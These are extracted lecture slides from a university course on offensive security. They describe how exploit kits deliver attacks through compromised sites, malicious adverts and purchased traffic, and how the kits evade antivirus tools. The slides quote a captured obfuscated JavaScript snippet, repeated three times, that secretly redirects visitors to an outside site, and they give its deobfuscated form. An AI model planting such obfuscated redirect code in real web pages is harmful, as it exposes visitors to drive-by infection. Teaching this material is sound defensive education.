Post on 25-Jul-2020
26/09/16
1
OffensivetechnologiesFall2016
Lecture3ExploitKitFunctionality
FabioMassacci
26/09/16 FabioMassacci- OffensiveTechnologies 1
Remember this scenario?
• Basicallythat’sthesameideaofanExploitKit– Execute
• 186localfunctions• 15functionsfromexternal sites
– Aggregatestaticcontentsfrom• 676websitesofwhich• 370externalwebsites• 193maybejustimages
– Aggregatedynamiccontentfrom• 8advertisers(atleast)
– Arealloftheseactions“good”ones?
• Justinsteadofadvertsitsendsyouexploits…
26/09/16 FabioMassacci- OffensiveTechnologies 2
26/09/16
2
Remember this scenario?• Basically that’s thesame ideaofthe
exploitserved bytheexploitkit– That’s aprogram containing
• at least 1682instructions– What happens whenwe openit?
• All instructions areexecuted• Not necessarily true that theresult is
displayed– PDFlanguage is Turing Complete
• ANY function canbewritten inPDFlanguage
• OpeningaPDFfilecanseamlesslydisplayanimageandsimultaneouslysolveFermat’s little theorem
• Sothestuff you got is not a“normal”pdf(oranimagesetc.)it issomething that makes you browsercrashandexecute somepartofthepdfthat you don’t really want toexecute
26/09/16 FabioMassacci- OffensiveTechnologies 3
Ekits Technologicalvector
• Reminderofkeyideaofallattacks– Systemisfedbyattackerwithcomputationallyvalidcode(theexploit)disguisedasaninputsto avulnerablecomponent
– Asaresultcodeisexecuted• Exploitkitscenarioisbasicallyinwhich– Systemà user’scomputer– Vulnerablecomponentà browser(oritsplug-ins)contactingawebserver
– Attackerà webserver– Exploità somefilethatbrowsernormallyprocess(egtext,images,scripts,ect.)
26/09/16 FabioMassacci- OffensiveTechnologies 4
26/09/16
3
WhatisanExploitKit?
• Essentiallyitisawebsite– Whencontactedbytheuseritlaunchesoneormoreattacks
againstthewebsite– Iftheattacksaresuccessfulitinfectsthesystems– Someadditionalcode(payload)isthenuploadedonthesystem
• Attacksexploitssoftwarevulnerabilities– Browser,pluginoperatingsystemsetc.– Independentlyfromthevulnerabilitiesthatisactuallyexploited
theygothroughthebrowser
• Thereareseveralofthem.Amongthemostfamous– Blackhole,RIG,Crimepack,Neutrino,BleedingLife,…
FabioMassacci- LucaAllodi
AttackDeliveryMechanisms
• Userreceivestheattackjustbyopeningawebpage– Thepageisnotnecessarilymalicious– Alegitimatepagemightload,unaware,maliciouselements
• Advertthatinrealityismalicious• iFrame insertbytheattacker
• Examplesofwhatyouneedtodo– Clickonalinkincludedinanemail– ClickonavideowithacatchytitleonFacebook– Openafriend’s(oranewssite)webpage– Hoveringwithamouseoversomething
• Fromtheuser’sperspectivethisis“doingnothing”
FabioMassacci- LucaAllodi
26/09/16
4
DeliveryMechanisms“inthewild”
FabioMassacci- LucaAllodi
Delivery0– StatusBefore Attack
8
Popularwebsitehomepage
Hacker/Exploitkitowner
iFrame
ExploitKit
User
26/09/16
5
Delivery1– CompromiseWebSite
9
Popularwebsitehomepage
Hacker/Exploitkitowner
iFrame
ExploitKit
User
Pointsto
Deliveryn.1– UserConnects toSite
10
Popularwebsitehomepage
Hacker/Exploitkitowner
iFrame
ExploitKit
User
Pointsto
26/09/16
6
Deliveryn.2– UserRedirected
Popularwebsitehomepage
Hacker/Exploitkitowner
iFrame
ExploitKit
User
Pointsto
Deliveryn.3– ExploitDelivered
12
Popularwebsitehomepage
Hacker/Exploitkitowner
iFrame
ExploitKit
Userattacks
Pointsto
26/09/16
7
CanWe Block It?
• Dowe “breaktheweb”bymaking this thingimpossible?
• Firewall– Idea:block “content”that arrives fromoutsideandis not requested
– Discussion:
26/09/16 FabioMassacci- OffensiveTechnologies 13
Can’t block it…
LucaAllodi
Popularwebsitehomepage
Hacker/Exploitkitowner
iFrame
ExploitKit
Userattacks
Pointsto
This is theGETresponse.Can’t drop itwithout breakingtheentire web
This is theoriginal GETrequest
26/09/16
8
Howdifficult is that?
• Mozilla development webpage– “Themouseover event is fired when apointing deviceis moved onto theelement that has thelistenerattached oronto one ofits children”
• Code“behind”animage?<img onmouseover="bigImg(this)”src=“http://toughguys.com/belen-b-side.gif”alt=“Belen Rodriguez showsher bestB-side”>
• Enough toadd this bittoapage
26/09/16 FabioMassacci- OffensiveTechnologies 15
Howdifficult is that (contd)
• Userperspective onwhat happened– Nothing happened– “There was this cheeky videobut Ididn’t clickonit”
• Technicalperspective onwhat happened– Moving themouseonacanvas is anaction– Javascript event triggered– Remoteurl loaded– Contentofremoteurl processed bybrower (orappropriateplug-in)
• What if imageis not well formed?– crashtheprocessorandtakeovercontrolfrombrowser
26/09/16 FabioMassacci- OffensiveTechnologies 16
26/09/16
9
CanWe Block It?
• Dowe “breaktheweb”bymaking this thingimpossible?
• Browser– Idea:disable “content”that is not what weexplicitly requested
– Discussion:
26/09/16 FabioMassacci- OffensiveTechnologies 17
AttackVector:SoftwareVulnerability
• Attack“content”nowbeendeliveredtothesystem• “content”isthen(mis)interpretedbythereceiving
softwareas“code”– Receivingsoftwarehasbug(vulnerability)incorrectlyprocessing
“content”– Bugisexploited(hencethename)sosystemexecutes“content”
as ifitwas“code”– Receivingsystemhasnowaytoknowthisisun-intended
• Typicallytwotypesofattack:– Scriptingcode(javascript,VBscript,..)interpretedbythe
browser– Malformedfiles(.swf,.pdf,.applet)loadedbyplugin/thirdparty
software
FabioMassacci- LucaAllodi
26/09/16
10
SampleofAttackVectors
FabioMassacci- LucaAllodi
AlternativeDeliveryMechanism
• Exploitkitsworksonlyiftheyreceiveconnectionsfromvictims– Links,adverts,iframes,redirections,..
• Ican’thackwebsitesisthereanalternative?• Thereexist(underground)marketstobuysuchconnections
– “Maladvertising”,spam,peopleresellingtheircompromisetolegitimatesite
– Actuallyevenlegitadvertnetworks• Attacker“buys”1000connectionsfromItalianusersthatuse
InternetExplorer7– Usersgetsredirectedtothedomainoftheattackerwhentheyload
theoriginallink• Requiresredirection
FabioMassacci- LucaAllodi
26/09/16
11
Traffic Redirection 0– Before Attack
21
Popularwebsitehomepage
ExploitKit
User
Exploitkitowner
iFrame
ADs
Traffic Redirection 1- Acquisition
22
Popularwebsitehomepage
ExploitKit
User
Exploitkitowner
iFrame
ADs
TrafficBroker/Hacker
26/09/16
12
Traffic Redirection 2– Acquisition II
23
Popularwebsitehomepage
ExploitKit
User
Exploitkitowner
iFrame
ADs
TrafficBroker/Hacker
Buystraffic
Traffic Redirection n.1-4– UserConnects
24
Popularwebsitehomepage
ExploitKit
Userattacks
Exploitkitowner
iFrame
ADs
TrafficBroker/Hacker
Buystraffic
26/09/16
13
CanWe Block It?
• Again,without breakingtheweb• Browserredirection– Idea:we forbid abrowsertoredirect connectionstodifferent url than theone intially specified
• Discussion
26/09/16 FabioMassacci- OffensiveTechnologies 25
Can’t doit
26
Popularwebsitehomepage
ExploitKit
Userattacks
Exploitkitowner
iFrame
ADs
TrafficBroker/Hacker
Buystraffic
This functionality is built-inonour Webbased onAdvertisingarevenue streem
26/09/16
14
Finalstep:Payoad Distribution
• Exploitofvulnerabilityonlygivescontroloftheuser’smachinecontrolforabriefinstant– Byitselfthistransientcontroldoesnotyieldmuchvalue– Weneedtomakethiscontrolmoreorlesspermanent– ordelivertothesystemsomethingthat“hasvalue”
• Exploitkitmustdeliver“payload”tothesystem– Example:openingarootshell,requesttodownloadandinstallmalware
• Thepayloadissometimescalledshellcode– Typicallyruninmachinelanguage– Loadeddirectlyinmemoryfromtheattacker– Executedbythesystem
FabioMassacci- LucaAllodi
Example Payloads
• After exploitinstall ransomware– Ransomware encrypts diskandowner ofsoftwarecandemand
payment todecrypt– Ransomware does not need tobecontrolled bythesame guy
running theexploitkit• Install Botnet client
– Botnet clientcanbere-sold onthemarket– Serviceofclientcanbedirectly sold for“Booter Services”
• Install Keylogger– Controlremotemachineforpossible re-saleofcaptured
credentials (orsnitching onyou partner)– Forexample creditcards canbeidentified as they are14
numbers withanumber oferror correcting codes
26/09/16 FabioMassacci- OffensiveTechnologies 28
26/09/16
15
Propagationvsoperation
• Strategy1:Highpropagationrate– PRO:severalinfections/unitoftime– AGAINST:Themoresamplesofmalwareinthewild,thehigherthechancestohandasampletosecurityresearchers• moreinfectionsà fasterdetection
• Strategy2:Lowpropagationrate– PRO:
• higherstealthiness• fewerchancesofinfectingasystemalreadyinfectedbyanothermalware
– AGAINST:fewerinfections/unitoftime
LucaAllodi
ExploitKits - Internals
• We now lookat ExploitKits as “softwareartefacts”how dotheylook?– Leakedsourcecodesof30+exploitkits– Vulnerabilityandexploitover70+kits
• OffensiveComponent– Theone responsbile foractually delivering thepayload tothe
connecting users• Defensive Component
– Not justusers connect tothewebsite.Also securitycompaniesdo– Mostly we want toavoid that theweburl hostingtheexploitkitis
blacklisted• ManagementConsole
– This is thereal purpose ofanexploitkit.
26/09/16
16
OffensiveComponent
• Whenthevictimssenditsfirst“GET”thekitwill1. Identifytheversionsoftheandtheoperatingsystem
(88%)2. Checkuserhasnotbeenalreadyinfected(64%)• viaIPchecking• Thisisessentialtoavoiduncontrolledpropagation
3. Checkifsystemisactuallyvulnerable4. Launcha“suitable”attack
• Lesssophisticatedkitslaunchattacksevenifsystemnotvulnerable(36%)
• Otherstrymorethanoneattacktypes
FabioMassacci- LucaAllodi
OffensiveComponent:II
• Itisenoughthatoneexploitsucceds forthetake-overtobesuccesful
• Typically10-12exploitsperkit– Recentlyalsoexploitkitswith3-5exploits– Oftennotveryrecent(1-2years)
• Typicalvulnerabilities– AdobeFlash,AcrobatReader,InternetExplorer,Java,altri plug-in
FabioMassacci- LucaAllodi
26/09/16
17
DefensiveComponents
• Exploitkitsmsut activelydefendthemselvesagainstAV/webrobots
• Obfuscationofpayloadedelmalware(82%)– Obfuscation+Crypto– Malwarepackers
• BlockIPtoavoidbeind sampledbyAV/Security(78%)• Evasionsfrobots+crawlers (3kitsonly)• Somekitsevencontrolinrela timewhethertheirurl isincludedinpubliclistsofmalwaredomains.
FabioMassacci- LucaAllodi
Defensive Components- II
FabioMassacci- LucaAllodi
26/09/16
18
DefensiveComponents- III
• AntiVirus softwaretypicallyrecognizesthefootprint(signature)ofamalwareloadedintomemory– ComparesuspiciousfileandDBsignatures– Ifthereisacorrespondence,executionissuspendedor
terminated• Packers→Theyarewhatthenamesaysm “packers”o
“wrappers”aroundthemalwarethatmodifyitssignature– Maintargetis“obfuscationofmalware”– “packedmalware”à differentmemoryfootprintof
downloaded“malware”• Attackercanalsousea“fresh”attackwithslightly
reducedchancesofbeingdetectedbythedefender.
FabioMassacci- LucaAllodi
Contentcompromisationexample
• Foundonwebsitetocreateandpublishcustomised onlinepolls[Provos 2006]
• Obfuscatedjavascript code– <SCRIPTlanguage=JavaScript>
functionotqzyu(nemz)juyu="lo";sdfwe78="catio";kjj="n.r";vj20=2;uyty="eplac";iuiuh8889="e";vbb25="(’";awq27="";sftfttft=4;fghdh="’ht";ji87gkol="tp:/";polkiuu="/vi";jbhj89="deo";jhbhi87="zf";hgdxgf="re";jkhuift="e.c";jygyhg="om’";dh4=eval(fghdh+ji87gkol+polkiuu+jbhj89+jhbhi87+hgdxgf+jkhuift+jygyhg);je15="’)";if(vj20+sftfttft==6)eval(juyu+sdfwe78+kjj+uyty+iuiuh8889+vbb25+awq27+dh4+je15);otqzyu();//</SCRIPT>
• Canyoudeobfuscate it?
LucaAllodi
26/09/16
19
Contentcompromisationexample
• Foundonwebsitetocreateandpublishcustomised onlinepolls[Provos 2006]
• Obfuscatedjavascript code– <SCRIPTlanguage=JavaScript>
functionotqzyu(nemz)juyu="lo";sdfwe78="catio";kjj="n.r";vj20=2;uyty="eplac";iuiuh8889="e";vbb25="(’";awq27="";sftfttft=4;fghdh="’ht";ji87gkol="tp:/";polkiuu="/vi";jbhj89="deo";jhbhi87="zf";hgdxgf="re";jkhuift="e.c";jygyhg="om’";dh4=eval(fghdh+ji87gkol+polkiuu+jbhj89+jhbhi87+hgdxgf+jkhuift+jygyhg);je15="’)";if(vj20+sftfttft==6)eval(juyu+sdfwe78+kjj+uyty+iuiuh8889+vbb25+awq27+dh4+je15);otqzyu();//</SCRIPT>
• Canyoudeobfuscate it?
LucaAllodi
Contentcompromisationexample
• Foundonwebsitetocreateandpublishcustomised onlinepolls[Provos 2006]
• Obfuscatedjavascript code– <SCRIPTlanguage=JavaScript>
functionotqzyu(nemz)juyu="lo";sdfwe78="catio";kjj="n.r";vj20=2;uyty="eplac";iuiuh8889="e";vbb25="(’";awq27="";sftfttft=4;fghdh="’ht";ji87gkol="tp:/";polkiuu="/vi";jbhj89="deo";jhbhi87="zf";hgdxgf="re";jkhuift="e.c";jygyhg="om’";dh4=eval(fghdh+ji87gkol+polkiuu+jbhj89+jhbhi87+hgdxgf+jkhuift+jygyhg);je15="’)";if(vj20+sftfttft==6)eval(juyu+sdfwe78+kjj+uyty+iuiuh8889+vbb25+awq27+dh4+je15);otqzyu();//</SCRIPT>
• Canyoudeobfuscate it?– location.replace(’http://videozfree.com’)
LucaAllodi
26/09/16
20
ManagementConsole
FabioMassacci- LucaAllodi
Gartner’s Quadrant perexploitkits
FabioMassacci- LucaAllodi
26/09/16
21
Explorationofakit:Crimepack
• “Darky”looks– Mostly because tooldesignerwant tosellitsusage toother parties
– Soimportant tolookatrue “professionalcriminal”
• Actually justasystemtomanage fragmentsofwebpages,files,andconnections
FabioMassacci- LucaAllodi
Exploitkit:availableattacks
FabioMassacci- LucaAllodi
26/09/16
22
Definitionandinjectionoftheexploitandthecorrespondingshellcode
FabioMassacci- LucaAllodi
AdministrativePanel
FabioMassacci- LucaAllodi
26/09/16
23
ExploitSelection
FabioMassacci- LucaAllodi
Key IdeaofExercise
• You connect directly toexploitkitweb-site– Mustsetupvirtual machinecorresponding towebserversothat it responds toyour requests onaspecific port
• Mustsetup exploitkitsite– Make sure that thewebserverexecutes thecodeoftheexploitkiti.e.that theexploitkitcodeis run when arequest tothat port is made(changeconfiguration file)
– Specify thepayload (calc.exe)andtheexploit• Launch attack– Connecttothewebserveronthespecified port– If attack works your browserwill openacalculator
26/09/16 FabioMassacci- OffensiveTechnologies 46
26/09/16
24
Deliveryn.3– ExploitDelivered
• What you have todo…
• Youjusthavetodoitwhere– theuserrunsona
laptop– theexploitkitruns
onavirtualmachinesonthelaptop
– Thecodeoftheexploitkitisavailableforyoutochangeitssource
47
ExploitKit
Userattacks
Pointsto
Additional Reading• OnCybercrime Surveys andReports
– J.BritoandT.Watkins.Loving thecyberbomb?Thedangers ofthreat inflation incybersecurity policy.HarvardNationalSecurity J.,3(1):39,2011.
– C.Herley.Theplight ofthetargeted attacker inaworldofscale.InProc.ofWEIS’10,2010.
– R.Wash.Folkmodels ofhomecomputersecurity.InProceedings oftheSixthSymposiumonUsable PrivacyandSecurity2010Jul 14(p.11).ACM.
• OnExploitKits– C.Grier etal.Manufacturingcompromise:theemergence ofexploit-as-a-
service.InProc.ofACMCCS’12,pp.821–832,2012– V.Kotov andF.Massacci.Anatomy ofexploitkits.In Proc.ofESSOS’13,pp.181–
196,2013.– N.Nikiforakis,F.Maggi,G.Stringhini,M.Z.Rafique,W.Joosen,C.Kruegel,F.
Piessens,G.Vigna,andS.Zanero.Stranger danger:Exploring theecosystem ofad-based url shortening services.InProc.ofWWW’14,pp.51–62,2014
– S.Lekies,B.Stock,andM.Johns.25million flows later:Large-scaledetectionofdom-based xss.InProc.ofACMCCS’13,pp.1193–1204,2013.
26/09/16 FabioMassacci- OffensiveTechnologies 48